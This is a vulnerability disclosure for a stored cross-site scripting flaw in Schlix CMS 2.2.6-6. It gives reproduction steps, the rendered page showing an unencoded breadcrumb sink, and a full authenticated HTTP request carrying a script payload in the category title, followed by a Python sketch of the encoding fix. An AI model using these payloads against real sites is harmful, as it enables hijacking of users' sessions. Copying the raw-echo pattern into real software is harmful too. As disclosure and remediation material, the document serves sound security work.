Schlix CMS 2.2.6-6 Cross Site Scripting

2021.05.06
Credit: Emircan Bas
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
# Date: 2021-05-05
# Exploit Author: Emircan Baş
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer

==> Tutorial <==

1- Log in with your account.
2- Go to the contacts section. Directory is '/admin/app/contact'.
3- Create a new category and type an XSS payload into the category title.
4- The XSS payload is executed when we visit the created page.

==> Vulnerable Source Code <==

<article class="main category">
  <div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');">
    <div class="media-header-title container d-flex h-100">
      <div class="row align-self-center w-100">
        <div class="col-8 mx-auto">
          <div class="text-center">
            <h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1>    # OUR PAYLOAD IS NON-EXECUTABLE
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="breadcrumb-bg">
    <div class="container">
      <div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms"> <i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item"> <a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div>
    </div>    # EXECUTED PLACE
  </div>

==> HTTP Request <==

POST /admin/app/contacts?action=savecategory HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489
Content-Length: 4146
Origin: (ORIGIN)
Connection: close
Referer: (REFERER)
Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1

-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="_csrftoken"

49feefcd2b917b9855cd55c8bd174235fa5912e4
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cid"

6
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="parent_id"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="guid"

ee34f23a-7167-a454-8576-20bef7575c15
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="title"

<script>alert(1)</script>
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="status"

1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="virtual_filename"

script-alert-1-script
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="summary"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="description"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_description"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_key"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="tags"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_available"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_expiry"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="items_per_page"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

display_pagetitle
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

display_child_categories
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

display_items
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[child_categories_sortby]"

date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[items_sortby]"

date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read_everyone"

everyone
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"

1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"

2
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"

3
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_write[]"

1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_selection"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_upload"; filename=""
Content-Type: application/octet-stream


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_path"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_url"


-----------------------------280033592236615772622294478489--
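The rendered output above shows the root cause: the same category title is HTML-encoded in the <h1> but echoed raw into the breadcrumb anchor, so a second sink was missed. The Python sketch below is an added illustration, not Schlix's PHP code; it reproduces that sink mismatch beside a hardened renderer that encodes the title at every HTML sink, using a constructed sample title and assumed function names.

```python
import html

# Constructed sample title; the same kind of payload the advisory stores via the "title" field.
PAYLOAD_TITLE = "'\"><script>alert(1)</script>"


def render_category_vulnerable(title: str, slug: str) -> str:
    """Mimics the behaviour visible in the advisory's page source (assumed, not Schlix code):
    the heading sink is encoded, the breadcrumb sink is not."""
    heading = f'<h1 class="item title" itemprop="headline">{html.escape(title, quote=True)}</h1>'
    # Second sink for the same stored value, inserted without encoding.
    crumb = f'<li class="breadcrumb-item"><a href="/cms/contacts/{slug}/">{title}</a></li>'
    return heading + crumb


def render_category_fixed(title: str, slug: str) -> str:
    """Hardened form: encode once per context and reuse the encoded value at every sink."""
    safe_title = html.escape(title, quote=True)   # HTML body context (also safe for text in <a>)
    safe_slug = html.escape(slug, quote=True)     # attribute context, quotes must be encoded too
    heading = f'<h1 class="item title" itemprop="headline">{safe_title}</h1>'
    crumb = f'<li class="breadcrumb-item"><a href="/cms/contacts/{safe_slug}/">{safe_title}</a></li>'
    return heading + crumb


def contains_raw_script(fragment: str) -> bool:
    """Cheap regression check for a template test suite: did a literal <script tag survive encoding?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    slug = "script-alert-1-script"
    print("vulnerable:", contains_raw_script(render_category_vulnerable(PAYLOAD_TITLE, slug)))
    print("fixed:     ", contains_raw_script(render_category_fixed(PAYLOAD_TITLE, slug)))
```

The check is deliberately crude; in a real test suite, render every template that prints the title and assert none of them emits the stored value unencoded.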


Copyright 2024, cxsecurity.com
